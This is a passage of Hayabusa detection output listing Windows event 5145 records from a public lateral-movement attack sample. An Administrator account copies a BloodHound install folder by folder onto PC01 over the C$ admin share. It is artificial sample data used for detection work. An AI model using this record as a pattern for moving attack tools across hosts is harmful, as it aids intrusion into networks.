0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\rimraf | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\safe-buffer | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.349 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\setimmediate | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\signal-exit | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.359 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.369 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\filters | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\streamers | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding\lib | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\example | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test\server | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\unzipper | IP Addr: 
10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\es5 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\esnext | IP 
Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src\schemes | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\util-deprecate | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\voc | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\warning | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\wrappy | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\write-file-atomic | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Float | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Menu | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Modals | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer\Tabs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Spotlight | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Zoom | IP Addr: 10.0.2.15 | LID: 